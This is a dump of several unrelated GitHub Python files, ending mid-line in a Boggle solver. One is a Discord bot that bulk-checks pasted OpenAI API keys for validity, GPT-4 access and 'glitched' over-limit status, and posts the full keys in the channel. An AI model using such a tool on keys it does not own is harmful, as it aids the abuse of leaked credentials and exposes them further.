Waiting\",compute=\"count_all\")\n count_picking_partial=fields.Integer(string=\"Count Picking Waiting\",compute=\"count_all\")\n count_picking_done=fields.Integer(string=\"Count Picking Waiting\",compute=\"count_all\")\n \n @api.multi\n def view_data(self):\n result = {}\n if self.action_id:\n result = self.action_id and self.action_id.read()[0] or {}\n if self.action_id.res_model == 'ir.cron':\n cron_ids = self.find_amazon_cron(self.action_id)\n result['domain'] = \"[('id','in',[\" + ','.join(map(str, cron_ids)) + \"])]\" \n else:\n result = self.action_id and self.action_id.read()[0] or {}\n return result ","repo_name":"ljp1992/mxnet","sub_path":"amazon_ept_v10/models/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":8931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"41948081025","text":"import math\ndef calculate_3d_distance(arr1,arr2):\n\tdistance = math.sqrt( (arr1[0]-arr2[0])**2 + (arr1[1]-arr2[1])**2 + (arr1[2]-arr2[2])**2 )\n\treturn distance\n\ncases = int(input())\nfor i in range(cases):\n\tline = input().rstrip().split(\" \")\n\tspaceship = list(map(int,line))\n\tenemies = []\n\tfor x in range(spaceship[3]):\n\t\tline = input().rstrip().split(\" \")\n\t\tenemy_temp = list(map(int,line))\n\t\tenemies.append(enemy_temp)\n\tamt_in_range = 0\n\tfor each_enemy in enemies:\n\t\tdistance = calculate_3d_distance(spaceship[:-1],each_enemy[:-1])\n\t\tif distance <= each_enemy[3]:\n\t\t\tamt_in_range += 1\n\tprint(\"You will be picked up by {} radars.\".format(amt_in_range))","repo_name":"Nate8888/programming-contest-practice","sub_path":"programming-team/First Semester/Eigth/spaceship.py","file_name":"spaceship.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21813441782","text":"import discord\r\nimport openai\r\nimport aiohttp\r\nimport asyncio\r\nfrom 
concurrent.futures import ThreadPoolExecutor\r\nfrom datetime import datetime, timedelta\r\nfrom discord.ext import commands\r\n\r\n# Your Discord bot token here\r\nTOKEN = 'token'\r\n\r\nintents = discord.Intents.default()\r\nintents.messages = True\r\nintents.guilds = True\r\nintents.message_content = True\r\n\r\nbot = commands.Bot(command_prefix='!', intents=intents)\r\nbot.remove_command('help')\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(f'{bot.user.name} has connected to Discord!')\r\n\r\n\r\n@bot.command(name='help')\r\nasync def help_command(ctx):\r\n embed = discord.Embed(\r\n title=\"Bot Commands Help\",\r\n description=\"These are the available commands for the bot:\",\r\n color=discord.Color.blue()\r\n )\r\n\r\n embed.add_field(\r\n name=\"!checkkeys\",\r\n value=\"Usage:\\n !checkkeys\\n\\n\\n\\n...\\n\\nThis command checks the status and details of the OAI API keys. It can also detect keys with GPT-4 model and glitched keys.\",\r\n inline=False\r\n )\r\n\r\n await ctx.send(embed=embed)\r\n\r\n\r\nclass OAIKeyChecker:\r\n desired_models = [\"gpt-3.5-turbo\", \"gpt-3.5-turbo-0301\", \"gpt-4\", \"gpt-4-0314\"]\r\n usage_endpoint = 'https://api.openai.com/dashboard/billing/usage'\r\n subscription_endpoint = 'https://api.openai.com/dashboard/billing/subscription'\r\n\r\n @staticmethod\r\n def list_models(api_key):\r\n openai.api_key = api_key\r\n models = openai.Model.list()\r\n return [model.id for model in models['data']]\r\n\r\n @staticmethod\r\n def filter_models(models):\r\n return [model for model in models if model in OAIKeyChecker.desired_models]\r\n\r\n @staticmethod\r\n async def get_limits(api_key):\r\n headers = {\r\n \"authorization\": f\"Bearer {api_key}\",\r\n }\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(OAIKeyChecker.subscription_endpoint, headers=headers) as response:\r\n if response.status == 200:\r\n return await response.json()\r\n else:\r\n raise Exception(f\"Error fetching usage and 
limits: {response.text}\")\r\n\r\n @staticmethod\r\n def is_glitched(access_until, total_usage, hard_limit_usd):\r\n current_timestamp = datetime.now().timestamp()\r\n return current_timestamp > access_until or float(total_usage) >= (hard_limit_usd + 1)\r\n\r\n @staticmethod\r\n async def get_usage(api_key, start_date, end_date):\r\n headers = {\r\n \"authorization\": f\"Bearer {api_key}\",\r\n }\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(OAIKeyChecker.usage_endpoint, headers=headers, params={'start_date': start_date, 'end_date': end_date}) as response:\r\n response.raise_for_status()\r\n usage_data = await response.json()\r\n total_usage = usage_data.get('total_usage', 0) / 100\r\n return '{:.2f}'.format(total_usage)\r\n\r\n\r\n@bot.command(name='checkkeys')\r\nasync def checkkeys(ctx, *, keys_input: str = None):\r\n if keys_input:\r\n api_keys = [key.strip() for key in keys_input.splitlines() if key.strip()]\r\n else:\r\n api_keys = []\r\n\r\n # Add the start_date and end_date for the usage period\r\n start_date = (datetime.now() - timedelta(days=99)).strftime('%Y-%m-%d')\r\n end_date = (datetime.now() + timedelta(days=1)).strftime('%Y-%m-%d')\r\n\r\n # Send a message to let the user know their request is being processed\r\n await ctx.send(f'{ctx.author.mention} Processing request...')\r\n\r\n # Initialize the lists to store API keys with \"gpt-4\" models and glitched keys\r\n gpt_4_keys = []\r\n glitched_keys = []\r\n\r\n # Run the API key checks and store the results in a string\r\n result = ''\r\n \r\n async def process_api_key(idx, api_key):\r\n result = f\"API Key {idx}:\\n\"\r\n try:\r\n result += f\"{api_key}\\n\"\r\n usage_and_limits = await OAIKeyChecker.get_limits(api_key)\r\n access_until = datetime.fromtimestamp(usage_and_limits['access_until'])\r\n total_usage_formatted = await OAIKeyChecker.get_usage(api_key, start_date, end_date)\r\n\r\n if OAIKeyChecker.is_glitched(usage_and_limits['access_until'], 
total_usage_formatted, usage_and_limits['hard_limit_usd']):\r\n result += \"**!!!Possibly Glitched Key!!!**\\n\"\r\n glitched_keys.append(api_key)\r\n\r\n models = OAIKeyChecker.list_models(api_key)\r\n filtered_models = OAIKeyChecker.filter_models(models)\r\n\r\n if filtered_models:\r\n for model_id in filtered_models:\r\n result += f\" - {model_id}\\n\"\r\n\r\n if model_id == \"gpt-4\":\r\n gpt_4_keys.append(api_key)\r\n else:\r\n result += \" No desired models available.\\n\"\r\n\r\n result += f\" Access valid until: {access_until.strftime('%Y-%m-%d %H:%M:%S')}\\n\"\r\n result += f\" Soft limit: {usage_and_limits['soft_limit']}\\n\"\r\n result += f\" Soft limit USD: {usage_and_limits['soft_limit_usd']}\\n\"\r\n result += f\" Hard limit: {usage_and_limits['hard_limit']}\\n\"\r\n result += f\" Hard limit USD: {usage_and_limits['hard_limit_usd']}\\n\"\r\n result += f\" System hard limit: {usage_and_limits['system_hard_limit']}\\n\"\r\n result += f\" System hard limit USD: {usage_and_limits['system_hard_limit_usd']}\\n\"\r\n result += f\" Total usage USD: {total_usage_formatted}\\n\"\r\n except Exception as e:\r\n result += f\" This key is invalid or revoked\\n\"\r\n result += '\\n'\r\n return result\r\n\r\n async def run_concurrently(api_keys):\r\n with ThreadPoolExecutor() as executor:\r\n tasks = [asyncio.ensure_future(process_api_key(idx, api_key)) for idx, api_key in enumerate(api_keys, start=1)]\r\n results = await asyncio.gather(*tasks)\r\n return \"\".join(results)\r\n\r\n result = await run_concurrently(api_keys)\r\n\r\n result += f\"\\nNumber of API keys with 'gpt-4' model: {len(gpt_4_keys)}\\n\"\r\n for key in gpt_4_keys:\r\n result += f\" - {key}\\n\"\r\n\r\n result += f\"\\nNumber of possibly glitched API keys: {len(glitched_keys)}\\n\"\r\n for key in glitched_keys:\r\n result += f\" - {key}\\n\"\r\n\r\n # Group the information for each key\r\n key_information = result.split('\\n\\n')\r\n\r\n # Send the result to the Discord channel\r\n result_chunks = 
[]\r\n current_chunk = ''\r\n\r\n for info in key_information:\r\n # Check if the info can be added to the current_chunk without exceeding the limit\r\n if len(current_chunk) + len(info) + 2 <= 1950:\r\n current_chunk += f\"{info}\\n\\n\"\r\n else:\r\n # If not, add the current_chunk to result_chunks and start a new chunk\r\n result_chunks.append(current_chunk)\r\n current_chunk = f\"{info}\\n\\n\"\r\n # Add the last chunk to result_chunks\r\n result_chunks.append(current_chunk)\r\n\r\n # Send the chunks to the Discord channel\r\n for idx, chunk in enumerate(result_chunks):\r\n if idx == 0:\r\n await ctx.send(f'{ctx.author.mention}\\n```{chunk}```')\r\n else:\r\n await ctx.send(f'```{chunk}```')\r\n \r\n# Run the bot\r\nbot.run(TOKEN)","repo_name":"ElioCampos/OAI_API_Checker","sub_path":"OAI_API_Discord_Bot.py","file_name":"OAI_API_Discord_Bot.py","file_ext":"py","file_size_in_byte":7343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"33526401091","text":"N = int(input())\nc = list(map(int, input().split()))\nt = list(map(int, input().split()))\n\nt1, t2, t3 = [], [], []\nfor i in range(N):\n if t[i] == 1:\n t1.append(c[i])\n elif t[i] == 2:\n t2.append(c[i])\n else:\n t3.append(c[i])\n\nif t1 and t2 and t3:\n m3 = min(t3) \n m12 = min(t1) + min(t2) \n print(m3 if m3<=m12 else m12)\nelif t3:\n print(min(t3))\nelse:\n print(min(t1) + min(t2))\n \n","repo_name":"Sanket-Mathur/CodeChef-Practice","sub_path":"CHEFWORK.py","file_name":"CHEFWORK.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29812670474","text":"from appium import webdriver\nfrom test_app_weixin.page.base_page import BasePage\nfrom test_app_weixin.page.main_page import MainPage\n\n\nclass App(BasePage):\n # app启动时的通用参数\n def start(self):\n if self.driver is None:\n desired_caps = {\n \"platformName\": \"Android\",\n \"deviceName\": 
\"127.0.0.1:5555\",\n \"platformVersion\": \"7.1.2\",\n \"appPackage\": \"com.tencent.wework\",\n \"appActivity\": \".launch.WwMainActivity\",\n \"noReset\": \"true\",\n \"dontStopAppOnReset\": \"true\",\n \"unicodeKeyBoard\": \"true\",\n \"resetKeyBoard\": \"true\",\n \"settings[waitForIdleTimeout]\": 0\n }\n self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n else:\n self.driver.launch_app()\n self.driver.implicitly_wait(10)\n\n def goto_main(self):\n return MainPage(self.driver)\n","repo_name":"PAssassiN/hogwarts_ck16","sub_path":"test_app_weixin/page/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7564987739","text":"#!/usr/bin/env python\nimport ConfigParser\nimport collections\nimport json\nimport logging\nimport os\nimport re\nimport socket\nimport sys\nimport time\nfrom optparse import OptionParser\nfrom itertools import islice\n\nimport datadog\nimport requests\n\n'''\nThis script gathers metric data from opentsdb and use http api to send to Insightfinder\n'''\n\n\ndef get_parameters():\n usage = \"Usage: %prog [options]\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"-w\", \"--serverUrl\",\n action=\"store\", dest=\"serverUrl\", help=\"Server Url\")\n parser.add_option(\"-c\", \"--chunkLines\",\n action=\"store\", dest=\"chunkLines\", help=\"Timestamps per chunk for historical data.\")\n parser.add_option(\"-l\", \"--logLevel\",\n action=\"store\", dest=\"logLevel\", help=\"Change log verbosity(WARNING: 0, INFO: 1, DEBUG: 2)\")\n (options, args) = parser.parse_args()\n\n params = {}\n if options.serverUrl is None:\n params['serverUrl'] = 'https://app.insightfinder.com'\n else:\n params['serverUrl'] = options.serverUrl\n if options.chunkLines is None:\n params['chunkLines'] = 50\n else:\n params['chunkLines'] = int(options.chunkLines)\n params['logLevel'] = logging.INFO\n if 
options.logLevel == '0':\n params['logLevel'] = logging.WARNING\n elif options.logLevel == '1':\n params['logLevel'] = logging.INFO\n elif options.logLevel >= '2':\n params['logLevel'] = logging.DEBUG\n\n return params\n\n\ndef get_agent_config_vars():\n if os.path.exists(os.path.abspath(os.path.join(__file__, os.pardir, \"config.ini\"))):\n config_parser = ConfigParser.SafeConfigParser()\n config_parser.read(os.path.abspath(os.path.join(__file__, os.pardir, \"config.ini\")))\n try:\n user_name = config_parser.get('insightfinder', 'user_name')\n license_key = config_parser.get('insightfinder', 'license_key')\n project_name = config_parser.get('insightfinder', 'project_name')\n sampling_interval = config_parser.get('insightfinder', 'sampling_interval')\n all_metrics = []\n filter_hosts = []\n\n if len(config_parser.get('insightfinder', 'all_metrics')) != 0:\n all_metrics = config_parser.get('insightfinder', 'all_metrics').split(\",\")\n else:\n temp_metrics = get_metric_list_from_file()\n if temp_metrics is not None and len(temp_metrics) != 0:\n all_metrics = temp_metrics\n else:\n all_metrics = ['system.cpu.user', 'system.cpu.idle', 'system.cpu.system', 'system.disk.used',\n 'system.disk.free', 'system.mem.pct_usable', 'system.mem.total',\n 'system.mem.used', 'system.net.bytes_rcvd', 'system.net.bytes_sent',\n 'system.swap.used', 'system.net.packets_in.error', 'system.net.packets_out.error']\n if len(config_parser.get('insightfinder', 'filter_hosts')) != 0:\n filter_hosts = config_parser.get('insightfinder', 'filter_hosts').split(\",\")\n else:\n filter_hosts = get_host_list_from_file()\n if_http_proxy = config_parser.get('insightfinder', 'if_http_proxy')\n if_https_proxy = config_parser.get('insightfinder', 'if_https_proxy')\n host_chunk_size = int(config_parser.get('insightfinder', 'host_chunk_size'))\n metric_chunk_size = int(config_parser.get('insightfinder', 'metric_chunk_size'))\n except ConfigParser.NoOptionError:\n logger.error(\n \"Agent not correctly 
configured. Check config file.\")\n sys.exit(1)\n\n if len(user_name) == 0:\n logger.warning(\n \"Agent not correctly configured(user_name). Check config file.\")\n sys.exit(1)\n if len(license_key) == 0:\n logger.warning(\n \"Agent not correctly configured(license_key). Check config file.\")\n sys.exit(1)\n if len(project_name) == 0:\n logger.warning(\n \"Agent not correctly configured(project_name). Check config file.\")\n sys.exit(1)\n\n config_vars = {\n \"userName\": user_name,\n \"licenseKey\": license_key,\n \"projectName\": project_name,\n \"allMetrics\": all_metrics,\n \"filterHosts\": filter_hosts,\n \"samplingInterval\": sampling_interval,\n \"hostChunkSize\": host_chunk_size,\n \"metricChunkSize\": metric_chunk_size,\n \"httpProxy\": if_http_proxy,\n \"httpsProxy\": if_https_proxy\n }\n\n return config_vars\n else:\n logger.error(\n \"Agent not correctly configured. Check config file.\")\n sys.exit(1)\n\n\ndef get_datadog_config():\n \"\"\"Read and parse DataDog config from config.ini\"\"\"\n if os.path.exists(os.path.abspath(os.path.join(__file__, os.pardir, \"config.ini\"))):\n config_parser = ConfigParser.SafeConfigParser()\n config_parser.read(os.path.abspath(os.path.join(__file__, os.pardir, \"config.ini\")))\n try:\n datadog_app_key = config_parser.get('datadog', 'app_key')\n datadog_api_key = config_parser.get('datadog', 'api_key')\n datadog_http_proxy = config_parser.get('datadog', 'datadog_http_proxy')\n datadog_https_proxy = config_parser.get('datadog', 'datadog_https_proxy')\n except ConfigParser.NoOptionError:\n logger.error(\n \"Agent not correctly configured. Check config file.\")\n sys.exit(1)\n\n if len(datadog_app_key) == 0:\n logger.warning(\n \"Agent not correctly configured(APP KEY). Check config file.\")\n exit()\n if len(datadog_api_key) == 0:\n logger.warning(\n \"Agent not correctly configured(API KEY). 
Check config file.\")\n exit()\n\n datadog_config = {\n \"DATADOG_APP_KEY\": datadog_app_key,\n \"DATADOG_API_KEY\": datadog_api_key,\n \"httpProxy\": datadog_http_proxy,\n \"httpsProxy\": datadog_https_proxy\n }\n else:\n logger.warning(\"No config file found. Exiting...\")\n exit()\n\n return datadog_config\n\n\ndef get_metric_list_from_file():\n \"\"\"Get available metric list from File\"\"\"\n metric_list = set()\n if os.path.exists(os.path.abspath(os.path.join(__file__, os.pardir, \"metrics.txt\"))):\n with open(os.path.abspath(os.path.join(__file__, os.pardir, \"metrics.txt\")), 'r') as f:\n for line in f:\n if line not in ['\\n', '\\r\\n']:\n metric_list.add(line.replace('\\n', ''))\n logger.debug(\"Get metric list from file: \" + str(metric_list))\n return list(metric_list)\n\n\ndef get_host_list_from_file():\n \"\"\"Get available host list from File\"\"\"\n metric_list = set()\n if os.path.exists(os.path.abspath(os.path.join(__file__, os.pardir, \"hosts.txt\"))):\n with open(os.path.abspath(os.path.join(__file__, os.pardir, \"hosts.txt\")), 'r') as f:\n for line in f:\n if line not in ['\\n', '\\r\\n']:\n metric_list.add(line.replace('\\n', ''))\n logger.debug(\"Get host list from file: \" + str(metric_list))\n return list(metric_list)\n\n\ndef get_metric_list():\n \"\"\"Get available metric list from Datadog API\"\"\"\n metric_list = []\n from_time = int(time.time()) - 60 * 60 * 24 * 1\n result = datadog.api.Metric.list(from_time)\n if 'metrics' in result.keys() and len(result['metrics']) != 0:\n metric_list = list(result['metrics'])\n return metric_list\n\n\ndef get_host_list():\n \"\"\"Get available host list from Datadog API\"\"\"\n hosts_list = []\n host_totals = datadog.api.Hosts.totals()\n total_hosts = 0\n if 'total_active' in host_totals.keys():\n total_hosts = int(host_totals['total_active'])\n if total_hosts > 100:\n for index in range(0, total_hosts + 1, 100):\n result = datadog.api.Hosts.search(start=index)\n if 'host_list' in result.keys() 
and len(result['host_list']) != 0:\n for host_meta in result['host_list']:\n hosts_list.append(host_meta[\"name\"])\n else:\n result = datadog.api.Hosts.search()\n if 'host_list' in result.keys() and len(result['host_list']) != 0:\n for host_meta in result['host_list']:\n hosts_list.append(host_meta[\"name\"])\n return hosts_list\n\n\ndef get_metric_data(metric_list, host_list, start_time, end_time, collected_data_map):\n \"\"\"Get metric data from Datadog API\"\"\"\n\n def format_data_entry(json_data_entry):\n metric_name = json_data_entry.get('metric')\n logger.debug(\"json_data_entry is: \" + str(json_data_entry))\n host_name_arr = str(json_data_entry.get('scope'))\n logger.debug(\"host_name_arr is: \" + host_name_arr)\n host_name_arr = host_name_arr.split(\":\")\n logger.debug(\"host_name_arr length is: \" + str(len(host_name_arr)))\n if len(host_name_arr) > 0:\n logger.debug(\"host_name_arr[1] is: \" + str(host_name_arr[1]))\n if len(host_name_arr) == 2:\n #host_name = host_name_arr[0]\n host_name = host_name_arr[1]\n else:\n host_name = \"unknown_host\"\n datapoints = json_data_entry.get('pointlist', [])\n header_field = make_safe_metric_key(metric_name) + \"[\" + make_safe_metric_key(host_name) + \"]\"\n for each_point in datapoints:\n if len(each_point) < 2 or each_point[1] is None:\n continue\n metric_value = each_point[1]\n epoch = int(each_point[0])\n if epoch in collected_data_map:\n timestamp_value_map = collected_data_map[epoch]\n else:\n timestamp_value_map = {}\n\n timestamp_value_map[header_field] = str(metric_value)\n collected_data_map[epoch] = timestamp_value_map\n\n # Set one metric multiple host\n # for metric in all_metrics_list:\n query = \"\"\n for host_name in host_list:\n for each_metric in metric_list:\n #query += each_metric + '{*}by{' + host_name + '},'\n query += each_metric + '{host:' + host_name + '},'\n query = query[:-1]\n\n datadog_metrics_result = datadog.api.Metric.query(start=start_time, end=end_time, query=query)\n\n status = 
datadog_metrics_result.get('status', 'error')\n\n if status == 'ok' and datadog_metrics_result['series']:\n # format metric and save to collected_data_map\n map(lambda d: format_data_entry(d), datadog_metrics_result['series'])\n\n\ndef send_data(chunk_metric_data):\n send_data_time = time.time()\n # prepare data for metric streaming agent\n to_send_data_dict = dict()\n to_send_data_dict[\"metricData\"] = json.dumps(chunk_metric_data)\n to_send_data_dict[\"licenseKey\"] = agent_config_vars['licenseKey']\n to_send_data_dict[\"projectName\"] = agent_config_vars['projectName']\n to_send_data_dict[\"userName\"] = agent_config_vars['userName']\n to_send_data_dict[\"instanceName\"] = socket.gethostname().partition(\".\")[0]\n to_send_data_dict[\"samplingInterval\"] = str(int(agent_config_vars['samplingInterval']) * 60)\n to_send_data_dict[\"agentType\"] = \"custom\"\n\n to_send_data_json = json.dumps(to_send_data_dict)\n logger.debug(\"TotalData: \" + str(len(bytearray(to_send_data_json))))\n\n # send the data\n post_url = parameters['serverUrl'] + \"/customprojectrawdata\"\n for _ in xrange(ATTEMPTS):\n try:\n if len(if_proxies) == 0:\n response = requests.post(post_url, data=json.loads(to_send_data_json))\n else:\n response = requests.post(post_url, data=json.loads(to_send_data_json), proxies=if_proxies)\n if response.status_code == 200:\n logger.info(str(len(bytearray(to_send_data_json))) + \" bytes of data are reported.\")\n logger.debug(\"--- Send data time: %s seconds ---\" % (time.time() - send_data_time))\n else:\n logger.info(\"Failed to send data.\")\n return\n except requests.exceptions.Timeout:\n logger.exception(\n \"Timed out while flushing to InsightFinder. 
Reattempting...\")\n continue\n except requests.exceptions.TooManyRedirects:\n logger.exception(\n \"Too many redirects while flushing to InsightFinder.\")\n break\n except requests.exceptions.RequestException as e:\n logger.exception(\n \"Exception while flushing to InsightFinder.\")\n break\n\n logger.error(\n \"Failed to flush to InsightFinder! Gave up after %d attempts.\", ATTEMPTS)\n\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for index in xrange(0, len(l), n):\n yield l[index:index + n]\n\n\ndef chunk_map(data, SIZE=50):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n it = iter(data)\n for i in xrange(0, len(data), SIZE):\n yield {k: data[k] for k in islice(it, SIZE)}\n\n\ndef make_safe_metric_key(metric):\n metric = LEFT_BRACE.sub('(', metric)\n metric = RIGHT_BRACE.sub(')', metric)\n metric = PERIOD.sub('/', metric)\n return metric\n\n\ndef normalize_key(metric_key):\n \"\"\"\n Take a single metric key string and return the same string with spaces, slashes and\n non-alphanumeric characters subbed out.\n \"\"\"\n metric_key = SPACES.sub(\"_\", metric_key)\n metric_key = SLASHES.sub(\".\", metric_key)\n metric_key = NON_ALNUM.sub(\"\", metric_key)\n return metric_key\n\n\ndef set_logger_config(level):\n \"\"\"Set up logging according to the defined log level\"\"\"\n # Get the root logger\n logger_obj = logging.getLogger(__name__)\n # Have to set the root logger level, it defaults to logging.WARNING\n logger_obj.setLevel(level)\n # route INFO and DEBUG logging to stdout from stderr\n logging_handler_out = logging.StreamHandler(sys.stdout)\n logging_handler_out.setLevel(logging.DEBUG)\n # create a logging format\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(process)d - %(threadName)s - %(levelname)s - %(message)s')\n logging_handler_out.setFormatter(formatter)\n logger_obj.addHandler(logging_handler_out)\n\n logging_handler_err = logging.StreamHandler(sys.stderr)\n 
logging_handler_err.setLevel(logging.WARNING)\n logger_obj.addHandler(logging_handler_err)\n return logger_obj\n\n\nif __name__ == \"__main__\":\n GROUPING_START = 15000\n GROUPING_END = 20000\n SPACES = re.compile(r\"\\s+\")\n SLASHES = re.compile(r\"\\/+\")\n NON_ALNUM = re.compile(r\"[^a-zA-Z_\\-0-9\\.]\")\n LEFT_BRACE = re.compile(r\"\\[\")\n RIGHT_BRACE = re.compile(r\"\\]\")\n PERIOD = re.compile(r\"\\.\")\n ATTEMPTS = 3\n\n parameters = get_parameters()\n log_level = parameters['logLevel']\n logger = set_logger_config(log_level)\n data_dir = 'data'\n agent_config_vars = get_agent_config_vars()\n if_proxies = dict()\n if len(agent_config_vars['httpProxy']) != 0:\n if_proxies['http'] = agent_config_vars['httpProxy']\n if len(agent_config_vars['httpsProxy']) != 0:\n if_proxies['https'] = agent_config_vars['httpsProxy']\n\n # get agent configuration details\n datadog_config = get_datadog_config()\n datadog_proxies = dict()\n if len(datadog_config['httpProxy']) != 0:\n datadog_proxies['http'] = datadog_config['httpProxy']\n if len(datadog_config['httpsProxy']) != 0:\n datadog_proxies['https'] = datadog_config['httpsProxy']\n if len(datadog_proxies) != 0:\n datadog_api = datadog.initialize(api_key=datadog_config['DATADOG_API_KEY'],\n app_key=datadog_config['DATADOG_APP_KEY'],\n proxies=datadog_proxies)\n else:\n datadog_api = datadog.initialize(api_key=datadog_config['DATADOG_API_KEY'],\n app_key=datadog_config['DATADOG_APP_KEY'])\n\n time_list = []\n # get data by cron\n data_end_ts = int(time.time())\n interval_in_secs = int(agent_config_vars['samplingInterval']) * 60\n data_start_ts = data_end_ts - interval_in_secs\n time_list = [(data_start_ts, data_end_ts)]\n try:\n raw_data_map = collections.OrderedDict()\n metric_data = []\n chunk_number = 0\n\n # get hosts list\n all_host_list = agent_config_vars['filterHosts']\n if len(all_host_list) == 0:\n all_host_list = get_host_list()\n\n # generate normalization ids if metrics are from API(config list empty)\n 
all_metrics_list = agent_config_vars['allMetrics']\n if len(all_metrics_list) == 0:\n all_metrics_list = get_metric_list()\n\n for data_start_ts, data_end_ts in time_list:\n logger.debug(\"Getting data from datadog for range: {}-{}\".format(data_start_ts, data_end_ts))\n retry_metric_list = []\n retry_host_list = []\n\n for sub_metric_list in chunks(all_metrics_list, agent_config_vars['metricChunkSize']):\n for sub_host_list in chunks(all_host_list, agent_config_vars['hostChunkSize']):\n # get metric data from datadog every SAMPLING_INTERVAL\n try:\n get_metric_data(sub_metric_list, sub_host_list, data_start_ts, data_end_ts, raw_data_map)\n except Exception as e:\n retry_host_list.append(sub_host_list)\n retry_metric_list.append(sub_metric_list)\n logger.debug(\"Error while fetching metrics from DataDog. \" + str(sub_host_list))\n\n # retry for failed hosts\n for sub_metric_list in retry_metric_list:\n for sub_host_list in retry_host_list:\n # get metric data from datadog every SAMPLING_INTERVAL with 3 retry attempts\n for _ in xrange(ATTEMPTS):\n try:\n get_metric_data(sub_metric_list, sub_host_list, data_start_ts, data_end_ts, raw_data_map)\n break\n except Exception as e:\n logger.exception(\n \"Error while fetching metrics from DataDog. 
Reattempting...\\n Hosts: \" + str(\n sub_host_list))\n logger.exception(e)\n\n if len(raw_data_map) == 0:\n logger.error(\"No data for metrics received from datadog.\")\n sys.exit()\n for raw_data_map_chunk in chunk_map(raw_data_map, parameters['chunkLines']):\n min_timestamp = sys.maxsize\n max_timestamp = -sys.maxsize\n for timestamp in raw_data_map_chunk.keys():\n value_map = raw_data_map_chunk[timestamp]\n value_map['timestamp'] = str(timestamp)\n metric_data.append(value_map)\n min_timestamp = min(min_timestamp, timestamp)\n max_timestamp = max(max_timestamp, timestamp)\n if len(metric_data) != 0:\n chunk_number += 1\n logger.debug(\"Sending Chunk Number: \" + str(chunk_number))\n logger.info(\"Sending from datadog for range: {}-{}\".format(min_timestamp, max_timestamp))\n send_data(metric_data)\n metric_data = []\n\n except Exception as e:\n logger.error(\"Error sending metric data to InsightFinder.\")\n logger.error(e)\n","repo_name":"insightfinder/InsightAgent","sub_path":"datadog/getmetrics_datadog.py","file_name":"getmetrics_datadog.py","file_ext":"py","file_size_in_byte":19521,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"18"} +{"seq_id":"28364420206","text":"# Cole Halvorson\n# Boggle.py\n# analyzes boggle board from image and returns valid words\n# ONLY WORKS WITH SQUARE ARRAYS (2X2, 3X3, 4X4, ...)\n\nimport sys\nimport json\nimport time\nfrom OCR import analyzeImage, boardSize\nfrom _thread import start_new_thread\n\n\n# initialize dictionary from json file\ndef initDictionary():\n f = open('dictionary.json', 'r')\n data = json.load(f)\n f.close()\n\n for word in data: # remove all words less than 3 chars, capitalize\n if (len(word) > 2):\n dictionary.append(word.upper())\n\n# Binary Search Function\ndef binarySearch(Str, low, high, arr):\n if high >= low:\n mid = (high + low) // 2\n \n # If element is present at the middle itself\n if arr[mid] == Str:\n return True\n \n # If element is smaller than 
mid, then it can only\n # be present in left subarray\n elif arr[mid] > Str:\n return binarySearch(Str, low, mid - 1, arr)\n \n # Else the element can only be present in right subarray\n else:\n return binarySearch(Str, mid + 1, high, arr)\n \n else:\n # Element is not present in the array\n return False\n \n# A recursive function to print all words present on boggle\ndef findWordsUtil(boggle, visited, i, j, Str, size):\n # Mark current cell as visited and\n # append current character to str\n visited[i][j] = True\n Str = Str + boggle[i][j]\n\n # if string has not already been found and is in dictionary \n # add to list of found words\n # sort found for binary search\n if not(binarySearch(Str, 0, len(found) - 1, found)) and ((binarySearch(Str, 0, len(dictionary) - 1, dictionary))): \n found.append(Str)\n found.sort() \n \n # Traverse 8 adjacent cells of boggle[i,j]\n row = i - 1\n while row <= i + 1 and row < size:\n col = j - 1\n while col <= j + 1 and col < size:\n if (row >= 0 and col >= 0 and not visited[row][col]):\n findWordsUtil(boggle, visited, row, col, Str, size)\n col+=1\n row+=1\n \n # Erase current character from string and\n # mark visited of current cell as false\n Str = \"\" + Str[-1]\n visited[i][j] = False\n \n# find strings in board\ndef findWords(boggle, size):\n \n # Mark all characters as not visited\n visited = [[False for i in range(size)] for j in range(size)]\n \n # Initialize current string\n Str = \"\"\n \n # Consider every character and look for all words\n # starting with this character\n for i in range(size):\n for j in range(size):\n findWordsUtil(boggle, visited, i, j, Str, size)\n \n# print found words\ndef printFound():\n elapsedTime = str(time.time() - startTime)\n numWords = str(len(found))\n\n print('found ' + numWords + ' words in ' + elapsedTime + ' seconds:')\n\n for word in found: # print found words\n print(word) \n\n# print board\ndef printBoard(board, size):\n print('OCR recognized ' + str(size) + 'x' + str(size) + ' 
board:')\n print('')\n \n for row in board:\n print(row)\n\n print('')\n\n# sort found list by string length, longest first\ndef sortFound():\n found.sort(key=len, reverse=True) \n\n# print loading message\ndef printLoading(): \n while True:\n for x in range(0,4):\n b = 'analyzing, please wait' + ' .' * x\n print(b, end='\\r')\n time.sleep(1)\n\n sys.stdout.write('\\x1b[2K')\n\n# --------------------------------------------------------------------------------------------------\n# Driver Code\n# --------------------------------------------------------------------------------------------------\nstartTime = time.time()\n\ndictionary = []\nfound = []\nboard = []\n\nimg = 'images/4x4.jpg'\n\ninitDictionary()\nanalyzeImage(img, board)\nprintBoard(board, boardSize(img))\nstart_new_thread(printLoading, ())\nfindWords(board, 